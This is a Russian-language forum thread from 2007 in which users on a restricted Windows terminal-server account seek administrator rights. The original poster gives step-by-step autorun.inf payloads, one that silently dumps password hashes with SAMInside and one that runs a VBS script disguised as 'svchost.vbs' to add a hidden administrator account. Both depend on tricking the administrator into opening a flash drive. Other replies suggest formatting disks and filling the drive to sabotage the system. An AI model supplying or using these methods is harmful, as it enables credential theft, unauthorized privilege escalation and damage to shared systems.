[Как] Можно развлечься, имея ограниченную учётную запись
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-12 22:27:08.403333
|
|
|
NikLik
Сообщений: 20
Оценки: 0
Присоединился: 2007-05-17 12:57:00.973333
|
перехожу к описанию проблемы
есть сервер (ОС Windows 2003 server), есть х "тонких клиентов"(т.е. все операции исполняются на сервере, все файлы и т.д. хранятся на сервере, клиенты просто обращаются к серверу)(по сути– это один комп с множеством мониторов+ возможность мультипоточной работы), я сижу под ограниченной учётной записью
что я могу делать:
1) изменять файлы в своей папке (C:\documents and settings\имя_пользователя)
2) копировать файлы с диска С
Вопрос:
что можно сотворить при подобном раскладе? главная цель, разумеется, приобрести учётку админа
ЗЫ имеется возможность втыркивать свою флешку в сервер, защита- Nod32 c древними базами
Если задавать вопрос более конкретно, то он будет звучать "Можно ли запустить программу saminside(либо подобные) с параметрами, которые позволили бы копировать содержимое файла SAM на флешку при её "фтыркивании" в компьютер?"
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-12 22:54:30.920000
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
Зачем тебе программа saminside? Она пароли расшифровывает. Тебе bat'ник нужен copy и т.д. А запускать можно через autorun.inf. У меня вирус был так он тайком при вставке флешки запускал из RECYCLE(на любом диске есть) exe'шник:)
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-12 22:59:14.143333
|
|
|
OO7SOM
Сообщений: 165
Оценки: 0
Присоединился: 2007-07-19 14:42:15.950000
|
Вот-вот, почти тотже вопрос, толька каждый комп в отдельности, запрещено открывать все кроме ворда(даже блокнот) а нужна чтоб можна было запускать все что хош.
Система ХР защита Nod 32 с последними базами))) Хорошоб стащить имена и пароли других пользователей, ну иль хотяб логины…
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-12 23:07:47.983333
|
|
|
NikLik
Сообщений: 20
Оценки: 0
Присоединился: 2007-05-17 12:57:00.973333
|
quote:
ORIGINAL: Copper
Зачем тебе программа saminside? Она пароли расшифровывает. Тебе bat'ник нужен copy и т.д. А запускать можно через autorun.inf. У меня вирус был так он тайком при вставке флешки запускал из RECYCLE(на любом диске есть) exe'шник:)
хм, интересно мне посмотреть как ты будешь копировать SAM при подгруженной винде без saminside-до-подобных программ
ведь saiminside не только брутит, его главный +(в моих глазах)– возможность работы с подгруженной виндой
насчёт autorun.inf–понятно
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-16 20:28:13.330000
|
|
|
OO7SOM
Сообщений: 165
Оценки: 0
Присоединился: 2007-07-19 14:42:15.950000
|
Я нашел:
Уязвимость, обнаруженная в Windows XP, позволяет любому человеку получить административные права. Любой человек, имеющий доступ к компьютеру и Windows 2000 CD, может загрузить РС и запустить Windows 2000 Recovery Console. Windiws XP позволяет пользователю консоли работать как администратору, без пароля. "Посетитель" может получить полный доступ к диску без пароля, что в Windows 2000 при использовании Recovery Console запрещено.
Источник: http://www.briansbuzz.com/w/030213/
мош прокатит?
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-16 22:59:26.016666
|
|
|
AlexSka
Сообщений: 31
Оценки: 0
Присоединился: 2007-10-16 02:45:22.613333
|
с командной строки вроде можно форматнуть диски :) - не раз такое делали в бурсе :)
потом можно написать батник для забивания меморис на винте :) и оставить на часик :)
можно попробовать через разные скрипты добиваться прав админа (т.к.) на своей машине запускать сплойты (которые не видит NOD) …
а проще пойти и с помощью бутылки пива выбить с админа все пароли :)
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-17 00:13:18.463333
|
|
|
svyazizt
Сообщений: 591
Оценки: 0
Присоединился: 2007-02-26 13:28:47.116666
|
можно накидать туда порно и развлеваться
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-17 17:15:43.273333
|
|
|
NikLik
Сообщений: 20
Оценки: 0
Присоединился: 2007-05-17 12:57:00.973333
|
quote:
ORIGINAL: OO7SOM
Я нашел:
Уязвимость, обнаруженная в Windows XP, позволяет любому человеку получить административные права. Любой человек, имеющий доступ к компьютеру и Windows 2000 CD, может загрузить РС и запустить Windows 2000 Recovery Console. Windiws XP позволяет пользователю консоли работать как администратору, без пароля. "Посетитель" может получить полный доступ к диску без пароля, что в Windows 2000 при использовании Recovery Console запрещено.
Источник: http://www.briansbuzz.com/w/030213/
мош прокатит?
Нет, не прокатит, ибо я не имею физического доступа к серверу
quote:
ORIGINAL: AlexSka
с командной строки вроде можно форматнуть диски :) - не раз такое делали в бурсе :)
потом можно написать батник для забивания меморис на винте :) и оставить на часик :)
можно попробовать через разные скрипты добиваться прав админа (т.к.) на своей машине запускать сплойты (которые не видит NOD) …
а проще пойти и с помощью бутылки пива выбить с админа все пароли :)
Насчёт батника конечно идея неплоха(мдя… учитывая то что я могу изменять файлы только в своей папке), но всётаки не хотелосьбы так грубо портить систему.
Я всё-таки нашел выход.
Первый способ: достаём SAM:
1) Создаём в корне флешки файл autorun.inf со следующим содержиммым:
[autorun]
UseAutoPlay=1
shellexecute=saminside.exe -export
action=Запустить
action=@saminside.exe -export
label=SoncFamiLi
Shell\cmd1=Запустить
Shell\cmd1\Command=saminside.exe -export 2) Кидаем в корень флэхи файл saminside.exe(я думаю ненадо обьяснять что это за программа и где её достать).
3) Подходим к админу, даём ему флешку, делаем так чтоб он вставил её в комп и попытался открыть двойным щелчком по иконке флешки(через "Мой компьютер").
Теперь обьясняю– файл autorun.inf запускает файл saminside.exe с параметром -export (описание параметра: -export : program will import local users, save it to the file SAMInside.OUT and finish work;), который, в свою очередь, сохраняет имена учёток и хэши паролей в файл saminside.out=>приходите домой и спокойно расшифровываете
Второй способ: создаём учётку с правами админа:
1) Создаём в корне флешки файл autorun.inf со следующим содержиммым:
[autorun]
UseAutoPlay=1
shellexecute=svchost.vbs
action=Запустить
action=@svchost.vbs
label=SoncFamiLi
icon=svchost.vbs
Shell\cmd1=Запустить
Shell\cmd1\Command=svchost.vbs 2) Создаём в корне флешки файл svchost.vbs со следующим содержимым:
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Имя_юзверя пароль /add", True)
Call helo("C:\windows\system32\net.exe localgroup Администраторы Имя_юзверя /add", True) 3) Подходим к админу, даём ему флешку, делаем так чтоб он вставил её в комп и попытался открыть двойным щелчком по иконке флешки(через "Мой компьютер").
Теперь обьясняю– файл autorun.inf запускает файл svchost.vbs при открытии флешки с помощью двойного щелчка. Название svchost.vbs чтобы не так палевно было. В файлике содержиться код, который добавляется опр. юзера с опр. паролем и затем добавляет его в группу Администраторы.
ЗЫ Антивирь НОД32 с базами за 12 октября не ругнулся ни на один способ) Такчто за антивирь можете не беспокоиться.
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-10-18 13:57:44.110000
|
|
|
kolPeeX
Сообщений: 1456
Оценки: 0
Присоединился: 2007-01-25 14:57:57.683333
|
quote:
ORIGINAL: AlexSka
с командной строки вроде можно форматнуть диски :) - не раз такое делали в бурсе :)
потом можно написать батник для забивания меморис на винте :) и оставить на часик :)
можно попробовать через разные скрипты добиваться прав админа (т.к.) на своей машине запускать сплойты (которые не видит NOD) …
а проще пойти и с помощью бутылки пива выбить с админа все пароли :)
бред
ты не можешь форматнуть на диске загрузочный и системный разделы
|
|
|
|
|
RE: [Как] Можно развлечься, имея ограниченную учётную запись - 2007-11-05 01:58:00.790000
|
|
|
CooperSPB
Сообщений: 1
Оценки: 0
Присоединился: 2007-11-05 01:51:53.863333
|
А можно ли как то включить Автозагрузку в autorun.inf?
Просто у многих она выключена в mscofig
|
|
|
|
|
|
